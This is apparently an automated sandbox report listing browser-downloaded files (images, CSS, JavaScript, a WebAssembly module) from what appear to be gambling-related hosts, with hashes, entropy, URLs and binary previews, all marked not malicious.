                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZlwF0AaAbwDMUBPFALgoFc0YAXAS3U1ZKgEoyAXxIAPAJIBGADYNmbTmm68S7AQCJGSEAAIkrAE7s2agNwB5MACsQbAHQATEBXZoQABX0oIIfa2qYoEjUAfWCQJABZFHtGKRA1cgA3KClGEDoAQgAGQT4TZP1tEABedkw1ABF7XGA1PhI0UttFEHqkUvKsmAgKOpJ9DrUIgBYKADE+qSbFfXqYQYrGAHoAJj6UQYA5AE0RMz77YsxFPkwhEgtrNkwUWwBbKAgAcRBWVh8kU+w1diQAGRQAHMXAk1FIgS4xPZQWAUlAWPEgjB0IkPgoAMoACxQtSRKLR6ChoORaFR+iQCkuoNYmPY+nsbigvmof1+rFBDxcrCgLlZelBIBEMEx8MBIDGUiggNBvwAKvpqG5JdQ1EQ+PUTmdhJcbKwbvdHhFGNyOOhPmdflicXQYLZLCQtKwoTbbOwHa8AEJwhEukC5cggNDvfRPKB3dJMFimk5kGm/V1IK3ATAZCT1ONIWwQZWy2n0xnM0PhzB8YToMYoGCaWRRhQl85i1i5ukMpl+WGSn2R+RcVgCAraKDFDMmdgUTASYrD2mZwXC0XiyWAgA+y4zCfliuVfHX2ag1Gb+bb1CLIBLJhAUi0ZAH7GnvxIJUzjgoUFirFsAFUOFJbI3D/YULcH+YYgCQH5+N4GrFEIJhoNgEHUN4RDDiB4b5Ey2gDM+ThvlIH4RDyQZEX+ryEVyRFAWgeRjpgv5QK6LCpI4SDcDOBoUbybIkJsjB3GAPiYLM6q7jmeatoWoHnpe14DvM9G2M4aD2Gx8ZxkezJ8jw3bRtwAj6K8jD6Gg2gfuwhzFCAABkVkZGZSAAILGiguQmDAAD8qmZupEl+FCxS2uZ4HsT5mygQFzSgSoCZJimWRtA4uHvrYDkQOw6I+IkRggKRTbiQWfiflo+hep2MBnuuPkFdQUJ8LYNKB
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3219
                                                                                                                                                          Entropy (8bit):7.711830310077625
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:/AvnLBdhEO4B8J3eG4kmYKCuOgitMI3+qSkcq1V1YrczmB4Zw75zzTyqOOuBYU8V:o+e4k6Ogm3+qSkcO89757yqOT8tyg
                                                                                                                                                          MD5:0D27A69210BB7A013C4C8A5818F8445D
                                                                                                                                                          SHA1:9ED20EF367552AC7809114B8F76AA9047DFEDE37
                                                                                                                                                          SHA-256:264AB3FB1C82264D29253449D8E575D0725BE16E4573A3C58019EAC6A643F191
                                                                                                                                                          SHA-512:25578DF3098B24D4C670838978669510621C78FF04CA8A876E18F1044732B552F14069C5C9B2AEF797A481ED298A2699AC14B4B80D9A3CEBC6A8503D04AAC226
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_ky.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...riTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:420a253f-21eb-c14d-bee9-9f8f530514c9" xmpMM:DocumentID="xmp.did:A2A375E8A9E311E89D04D1A68640F071" xmpMM:InstanceID="xmp.iid:A2A375E7A9E311E89D04D1A68640F071" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e3ebebca-fdfe-7542-a464-e0c8b8192ae8" stRef:documentID="xmp.did:B8082874819511E78C02F58BB957D46E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..W...g..}.............r.[.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3135
                                                                                                                                                          Entropy (8bit):7.719009705926277
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:7ANn2NahJ37LRwzRTgulmbMP0BKsST31z7cDnc:c2wL2zRcMMUrVSc
                                                                                                                                                          MD5:FBDF1B9EA8B9A63089ACF0DD85A584B6
                                                                                                                                                          SHA1:C7EAD0B4C4BC24AC37398E7ED7A1DA6F56487EC7
                                                                                                                                                          SHA-256:5A3F912626C71255EF88C1ED10783AAF9B65FD72A61219AC9FF5D9101C3DA242
                                                                                                                                                          SHA-512:0ADB39CD6BA7AEFEDEEF547EFDB598D62B705A6FA7E8E0346BFEF8BF5876724ECFC2ECB057FBE85D47E07C95880FBF20DD4F98834FA681442BBB1CCBE928FF6B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_bg-w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:474519E7665F11E98B15C909A3FF0AB5" xmpMM:DocumentID="xmp.did:474519E8665F11E98B15C909A3FF0AB5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:474519E5665F11E98B15C909A3FF0AB5" stRef:documentID="xmp.did:474519E6665F11E98B15C909A3FF0AB5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>I8......IDATx..ipS....s.KH.,.x.,.f1[........h..85MJ...2.i..%.&.4@I0.....5a)K.@ ....x...1.$k.$K.u...t.!3..N.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2995
                                                                                                                                                          Entropy (8bit):7.876927908194028
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:HwbWwu9Ieks5RWRoRzeWUfCrin2DWV4UuIgoyS5plREtg:HwbWwv9RoRyBfCqP6od2g
                                                                                                                                                          MD5:878D7636A016DF19ACB6FFADD75564C6
                                                                                                                                                          SHA1:79A7413E3293432C68CC2A4E7EB44329A7D37DDE
                                                                                                                                                          SHA-256:537F779A2E6C2F59B9901943A21492C4AA5F46174082A3D3A15B7FD676827FEB
                                                                                                                                                          SHA-512:E53EB66A7079D23AA29B2AF564129972251621E024F3E66D317868FF26093D75A55DA3A140538C95547E68916593CF4E0AF994B0FAC66E95F83C46D1B1D8F817
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_tp-3.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME........J......IDATH..Kl\.y...?....!9.x.J.HY.%9.%;......].h.,.&..:....&-..@.iS.E[...l...^b....v..+.,...&.wr.........nR..}........Jm..i5\..{..'!......o.......r...C..-.......0..s......E..*=.....Gu.E.H..Lk.y......},..P..X|L.R.i."..D.H#..i.4..4.xCc.D....5V..7x.;............f....\#..C{...S`s..n.A..$......h./Q2C|tlKZ....e...$.......e......T.._}s.qk..Q.{..6nt./o.6;XJc.L*C........a.sOr..C....K..............s.!...k...g...3...O`.qo5.H.r<$.)....".....&`..e;.Q....<..9.O..4.A......!...c.|......D..=..E..3....EL..r..cR.TFM...b.G...X.d}..'KM.)..NC..ZwV.t.6*.7.G....<..Z.(.o..`....\.Y......{..C...B.M?p.9>I..d..dz@O*Z...M<....../.f.T&]..#z...A...EH..He...F...o}.i....0.~....H..?6${....d2..r.d.><.f....V.......We|...i..*J.L6EIj..6..S...............3.....276./9....A.<t..mJ.&..+kq.\...(.8..q...[up..+h.......C|.'.F..|..c...UD.. d`
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 715 x 242, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):205204
                                                                                                                                                          Entropy (8bit):7.996727380645683
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:6144:jB+np9u6cFmDLpB34ShGmPwelibhuANX5x9:jYnp9udFm3n34ShFGAY
                                                                                                                                                          MD5:A34CA6306B6E15DEFF5B1169C8B0AE33
                                                                                                                                                          SHA1:68162203F1C56481FF288F3F0678860DEDF50321
                                                                                                                                                          SHA-256:F231FC2FB00DCF1512C7A292B7010C9D59C8457D5A6D808E5734B6093843E8CD
                                                                                                                                                          SHA-512:A1DC8689B5DF0C57C6A329457D780503BE1411D59A37C6DA51BE75C0D07D085B128CF0B614802C8B506C3AA95D64904B06B47214D1513A9E5164542627FC2813
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/lang_pz/264.png
                                                                                                                                                          Preview:.PNG........IHDR...................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:0E07ED45237B11E885CA96B074FCF8EE" xmpMM:DocumentID="xmp.did:0E07ED46237B11E885CA96B074FCF8EE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0E07ED43237B11E885CA96B074FCF8EE" stRef:documentID="xmp.did:0E07ED44237B11E885CA96B074FCF8EE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>1.......IDATx....Te.5.+.\]U.sn.&4M.I2....#..0.i..0+....%I....:.t7.s...}......_..YK.U..:.}.....:U..(8p.....^|.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2780
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):625
                                                                                                                                                          Entropy (8bit):7.652440032005788
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XCF0xB20YjdClbtSqwVbcBmsLngbbNA0SU3xvy6Zb7+TI1Dwws2eAl/+zKZ:Xc0Ln+4btSB7fN7Bbh+81DFsud+zKZ
                                                                                                                                                          MD5:B8988EAB66DA2D31655D633542FC2A4B
                                                                                                                                                          SHA1:5A5163FA97352C9873B15117DD1E9B65FD4B720A
                                                                                                                                                          SHA-256:2D3EB38E84475418805F3389A2DFCADDFA515010A7868BC6A08D8925EE8C60F4
                                                                                                                                                          SHA-512:DCC36395106C2FD34647A10CA0482BB14A5D7D4B2487D9D1FBB3C2D37550F71A42ACF2CD02AE86DB8F49B68666534B2518FBB0BA2DE3581FB4DEB688C7768A0C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://2hsuoj.eveday.me/ftl/sunCity1762/themes/style/bootstrap-dialog.min.css
                                                                                                                                                          Preview:...........V..0.|.+,U.......5.Z.W6..X8..v.\u.^...A..< .......9...@K....Y6.A.Z....].......J.....Y.....FV.....b.....P'....@.&#_.<.8.s...tF...0.x..Q+.EF...\..........y..j*.....SI}\......V..kQ/..B..=A.H..##......B...=.........2..M..u....Q....|f......(..5.6a.r.q...dT...[A.(.Sn.TC...v...y...:...j.K..cU1.L|..k..Go...&ol=.j.+.?!.x...`.o.FK=.-...+...W.,].q..Q..V....8Ny.<.....C..F6.....'.\.V..$...^..b3.G..t9...U/.g.RK'...pS.O.|#]t..C..{.../...!......._.mK4..St....z.>.ooK.U..tP...E....k.,...1J...c5#......W0Zt-.6......,5.;.V......TF^.,a...d.a.o..VrW.Wp..~................g......&.45M......... ......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1243
                                                                                                                                                          Entropy (8bit):7.808044353377195
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:h97HQYN3c7kjn0W+vp7o0Ex7I7aYad0Uas8977o:XM0xjn0W+RyFI7a/KhVo
                                                                                                                                                          MD5:CE9F1A2CCC525914C5574C6C0007C374
                                                                                                                                                          SHA1:A81780B59C5FFB4ABF7B5536918548DB5BCB67C3
                                                                                                                                                          SHA-256:1171FC65767CE6A0E3C5769D387169F7F33866017CD0D3DA690D2F10C68EEC49
                                                                                                                                                          SHA-512:7BB125BC59141DA7D8DFD67FE23AC8FAE5A81AB43C7763E5F358C7E3278E9A63511AFBDDC97F8CA2762A0336F64C1E4C5E1B0985FE02D6D3291C40B6D64474C5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/new_service_icon.png
                                                                                                                                                          Preview:.PNG........IHDR... ..........S.4....IDATHK..[l.u.....- R .....VEb.......l.F.!1;-....D.J..1!*4.....S...}Q....;U.F.@n......Xj.-;.cf/e.Z.k.q.....;.]B.....6~|....t.3.20....8$...m..t6.4.`._<Z..JaZ..2....c........s.........]..1_bB...`...l"...at..W.Z5p+.....+Z.......%.FDq.F.K....qM-S..0.:.....}...W.2...s.G\...$..X..]B.............P.....@.3OC.n....(.......|(.....d5.T./.[...?.~.|...B.....#.dQ...Dk......\.@.q.."..2...j.ttR..M.Z .....K.r.Y.v....-"..a.z....S......$Hl.C.M..~gX....S....p....>u..IE.....4...W.C..:....S"z..}.6...lz8.........`t".S.\~o... .GZ75.......u.ve..3q...A.{.M....sr..;.hr.*o...h.?..aW...V...L...9r>r.....~'f..-...r.y..}w..;4........5uu^...<......o.Q.H....w..W....,[I(Y...@..,Q.U....p.v.F}y..c....._.......^.r3.=H...z.3.:3...U..(K..D.n8`K.XJ...5$.m.{7y..ci..J.iF+$..B........Q._.Vh. ......>._Q.3;`.6......au....|.,.H.`F..#.Hk.x..%..1...n.B.,...m.....!.>O...V..U..-....[JY.B.(...(..3W.hE*@L.......1b.........r.!.f6...g.&...:..[T|..I..8..M._3.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):108015
                                                                                                                                                          Entropy (8bit):6.099067518890094
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:uaglDavyQEyIWLcb/+W+2CJr71V+F3pdMBFf/kqjYf2FvZ/DKj8m9S4Aww0EEY:XlJM+W+2CJrs3pdOrkfkv0j8N2wEY
                                                                                                                                                          MD5:3875C16DCC2FC3155E37F22AA92632D0
                                                                                                                                                          SHA1:25D140EF2CF2AB3C6C9F656D2BE3C756068D5E0E
                                                                                                                                                          SHA-256:F682A144DBA0F29228190EEAAC8014C502C7539949128E9A5C8986BBEBAD8EE6
                                                                                                                                                          SHA-512:B946D8F48D3789B07E21E0EF5A761615E78F134277387E454160FA4C74EC04378DE5A5C44C459EF05C9FEFE4DF272AAB22ED3FAD259EA2D962F2E19AE77C1A19
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://stt-wasm.ai4funs.com/mimlib.wasm
                                                                                                                                                          Preview:.asm........`.......`....`..`...`.....`....`.....`..~......`.......`......`......`..........`........`..~..`..~.`...`.....~`.~..`..|`.....|`..~....`.~......`..~.....`.........`..|.`.........`.............env.runtime.ticks...wasi_snapshot_preview1.fd_write...env.syscall/js.valueGet...env.syscall/js.valuePrepareString...env.syscall/js.valueLoadString...env.syscall/js.finalizeRef...env.syscall/js.stringVal...env.syscall/js.valueSet...env.syscall/js.valueLength...env.syscall/js.valueIndex...env.syscall/js.valueCall..........................................................................................................................................p.............A......A....A.......memory...malloc.~.free...calloc....realloc...._start....resume....go_scheduler....asyncify_start_unwind....asyncify_stop_unwind....asyncify_start_rewind....asyncify_stop_rewind....asyncify_get_state.......A...BDVXYZ[\;:..............#.A.F.@#.#.(..A.k6..#.(..".(..!. .(..!. .(..!. .(..!. .(..!. .(..!....#.A.F.@#.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (7648), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7648
                                                                                                                                                          Entropy (8bit):5.937033305798227
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VSu4qFxjbfaFyVcN5iHKxeNfibCdutZe2BVokOYnCPpLWSNtR:VX4q/r6t5iPfiOA72PR3n
                                                                                                                                                          MD5:57648F1C0BE56658A512181CD40C0958
                                                                                                                                                          SHA1:19178FEDF0FA81538C378E1E4DD944F6618595F5
                                                                                                                                                          SHA-256:2B536CD8BAE2F58B12A4BB816886E866EEFB2B9DFBB0F9399DCF9019184CF22B
                                                                                                                                                          SHA-512:92B79D9E3BBCCC222E3007D75CB845D60E798F08B7B0CACE50A7278CB8AFE4CDB3B6C983A30BFC5ED01E108366E763D8128E6DCF43B6F4489A6CB78D5B284E77
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/noticeBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgBYAaQgZgEYBdYgbwCIKA2XFegLgDMBXNGAFwCW6TP2IhiggJS1+AOhAAPCCgBO/JAF5BmeoQCcnAKr0pmChSkBfYvVwA5MAHkOPPkJFiQMm/QDsAGqKAAquvALCaKLiPrb6fgj6Ye6R0RLSDNxIIAAESPyqggL0ANxOYABWIAJyACYgnIJoIMGqKBAg6gCemBL0APr9IEgAsii13AA2IPR0AG5Qk9wg7ACEAAxWUiULqjlo2rrrMBCcpsRQh/TrgsEAFudagnJRUFLEKFfMrOeqmrS1KD8KBccIeKIyVQgfjcVRoWjAJrNVRIdj0ehWGwwKFAkC1UEpEQyXY5fiafh3QRIcSaRFoWooYByADKAGkAJL2Eo6RgAQQqAHNTLo5AB6egAahAEvooqa9UUcgqSFMcgpICibgiIm8sjkdORWhA+qRnSQWxs3AggP4eIJ2ohskpSDkABJmop+AAVIpwTBa8GYYlQPZkukMplsznc3S1CoVXnC+hiyX8GWiyaCAV3DSZ+qqJUqqRqu4a/1g1L8GRIIO6ADEBs6qsz2f4zLznUwtEEtoAtuwAKwXbj8FAAdUEtQpawoxCQHbGcxWs/nk5AIxDAqa7BIMCQSAAolAkE0BWiQMeZuJj6e0ZnmiHZkgOnayOt1sRoFkVrgQGRh6OawfpMKDtEBxBwCAXStMMqKrLOMDoAUKCTHBs4QFCcwABL8L2kxorMHr8DheEEcQ6j4fBFyAhAQhLlhIBZjmM7EEu6hFIs4FsUIMCLAxTH8OwFBkEOcxenc3C9mAE5TncQnvsQFKSWA7J9kJxAwLCUJoPwwRQAKnTBCgJ7gmivaTrU0yzOg7ZrqoAAyKBQPiAapNWtb0A2pqqKqUK9igS4AMKTMeNb0DAzIALSUrU9RoKYmLWElmIaf82n5vagbBqG5LOjS8iutiF62ge0y9hqYiCOScj9NkkycDVM
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 90 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7088
                                                                                                                                                          Entropy (8bit):7.917580930636184
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:CYzFTu2hWevO50w81o5M986zRHIHsYbhAKF3TFPGIRRiNTKyB7MNnjeFYKdP01cs:zvO2wLy986zaMYbyKlTFeqRgL8nSXk9R
                                                                                                                                                          MD5:4DD817FCAA6B66B987CC9415894716B8
                                                                                                                                                          SHA1:EA57D7542100A0FDEAD72BFB96E4C330486486DF
                                                                                                                                                          SHA-256:9CA897EA7F9C32F28AE6419299623DBF4E1E311F4EAD569A94B27EBA4C1D6F10
                                                                                                                                                          SHA-512:05999ABE6B011A06EA092E9158CB2C6248BAFB816134E31CEDAE404637E8E0B9A039E77671EF1DAC92498FDE86B049D9AD6B1560E05C8CA638A21C3C8EB4DFE6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/live_dg.png
                                                                                                                                                          Preview:.PNG........IHDR...Z...<........E....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:070664E5F77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:070664E4F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...w....IDATx..Z....>..U..3=...0l.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (18632), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18632
                                                                                                                                                          Entropy (8bit):5.98982907585414
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:VuRs8jbUtpZjiZeg6Egf33db/h8a+DpBseCZJDkHN0I30QA3yj+Xn:4fU7ZKeg6Egf3by90DkH6Ipea+Xn
                                                                                                                                                          MD5:8AF7B35CAD66377E98B98D4261BB716D
                                                                                                                                                          SHA1:BD52F02009810E35FC621D7111D46F1A51E4435E
                                                                                                                                                          SHA-256:D4B93FA7F565BA13F42FAC331764CF7783550C11DF1624BB1779038FF30CF6CE
                                                                                                                                                          SHA-512:3BB40D0D221C1CD35D93E22DC32C80BE5D078393242798DFCAFAF98C8620FA828C7A497FE3F3D32EFADDD280B2B2CDB88158F6490C9BA88E400B387E8C811F3B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/manifest.js
                                                                                                                                                          Preview:a4vjeuue("IQMwrgdgxgLglgewgCgQSgN4DcCGAnAAgGcBeAdzggBMEyA6MgUwCMAHHKAawCkilWA3BWq0GLdl178S4aPCTIYAGgC2SgFaYQCPMlyFWSuErxKoJAAxKANiQDaAXQFQAPDDrXGEAOYwAFs4A1IFocCQwdlAOSox2cA4AZAnWdKxgRH7IsfF2Fg5oMXEOlgLauqwElAQqaADyzOqMsKl4CDBtAJ6sjHR+OES1ZBAACq3deDAddFA41tbIaqxoSah2rMUqa/mlOshESUSKqhpoAimePv4CaCkZcCAwyGhPAvfImmXI5hbOLuoeXl8ASgwTQeBIKAgdFI6ki2zwjBgYDwEAIeAAvgJ9AQYCQMOiYniAIwATlJAC4LJjZLBEKiUERMG8IkR8gikSicXZWXRGAAPVg6GBELH4AiMcLc4oYODkog2cnAIkxAVCojk/GY9nI1EIKXTWbzHr8wUTeWMGK81VmpQQAo9WzAKzG63C9FQiU0+QodDYMWkWIIJxvCwkMOM7WciCMMgEUYIFRwIiMZBeumoTAIJ7o05vCOInXEOwAJic2Nx0dj8cTydTkFpCmUdowAbsQfsTYcOYERBLxRgosIKhINCgYBUXnc3kRAFFPBOIMKAEIdAAqOG8ADkcBPkAAiPyMHBUPdoXLRdQjhBjhfuKAInAwRhzxi3/dEe9wVgwU8Cf6TboSD3J8+RgAB6dQcFwD88C/H8NGmPo8GTXE9zAGAQAAWgADj3BD+g6aASCdBD4AnBB0JIIli0YAAWW06GgJJ/hQgBBGAYFg5h0JTPcICQKBGDwqFoAKFi8HMKFWECPcwOLWiLAAViJAA2TCLAAZjAogYEfOAoAgogwL3QJkAwCxyWAhSVIAdkwygqH5TD1CIPCiUsmANOwmy7IcpyXLw4sPI0xTaKJezqH81ylA0jzsPiklMLaQ88AAYSQLCAqUWi4oSiLHL5ZzosUjyVIsJSkv8Rg0oyoq8JU0rysU
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2088
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):797
                                                                                                                                                          Entropy (8bit):7.76373736359512
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Xh54rz6dA/utp99m/R1M1//ZhJjF2+NqunH:XSz6dhp9Us1/RbNqsH
                                                                                                                                                          MD5:1BE1D6290006E67BCB2FACDFA571A4D1
                                                                                                                                                          SHA1:F5AE95AB95254A0834B9155E3594EF814F8C6837
                                                                                                                                                          SHA-256:02CB7CDD1B17375D306F6A4E3A16BA8B064166FCEFFD4BD45AF5ADC0AE37E894
                                                                                                                                                          SHA-512:4A90CEBC7FDACB4B92222F6A359761E99A14D8A7302747A3A3825EBDBECEBF0D9F20FBFC72560EF99FA4E5CDFD63120F544CEC9DB0BAC2DC03CC8D9413487227
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/websocket/PopUp.js
                                                                                                                                                          Preview:...........V[O.@.~.......51.a.Q./..&..1d...-...KH.E..........`..5&.e.7..'..3...>..y..9....o.[q......T...=K.e......&1... X.8@MQ.fVG...Cy..*I.Q....!..<..&.t{N. .....9...a...T.b..................}I..v...2.f.....{..W...}.......o../.....s.x.l~..o.....U.......{.L.O.a.u.:l*K.wR;.da.9A...8,...#K.2...c#......if....<g@..y..E"......@T..T..9.1-....,........a..b.....j...p."M.3r........?....o...r.?Z..a.e+...z..U.W.%.....A:.1z..b@U.lx9...E1.:.k%..M.a....4..}E....Qq,.Ft. .kc. ...d...Q..UD.l.......itDmG.i....XZ6|zD....Z..H.R..pm..........B.J.Z.......W..u...&...,..ZR...O#..N...]e...F...%..oo....O.u...........P.T9#5hP.W.x."vh.M.sC*.......A8...+......+....[.o..L.L.....F7.z.&..~.G......BmQ]5...O....F..kk...crj.....F.7l.0..5.L.I....[R...:j.........p_.q.(<.....F!2(...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4188
                                                                                                                                                          Entropy (8bit):7.935240274155136
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:e1PnwcQ+ZSqPyNzOY6mIJIh2KX7PoQzROWIvUYB:e8+Z9PyNzOYOSh2mPjzROQYB
                                                                                                                                                          MD5:FC52A6B19071451D81FA68656EC390EC
                                                                                                                                                          SHA1:FDC6116398D076351D533274F2337696DD75D9D6
                                                                                                                                                          SHA-256:BB4C74E9843E833DDC7A791E0BC4612EA2605F6D76D7258D9C44471DA9734287
                                                                                                                                                          SHA-512:A71A2D83DA5606A4E30D2E4EC998AC19800368CBBF4DF0912406874D00953E64DE8CBDCD7AA24E55A909BC68A858A409D3F0A9CEF0106178636066A180935FB2
                                                                                                                                                          Malicious:false
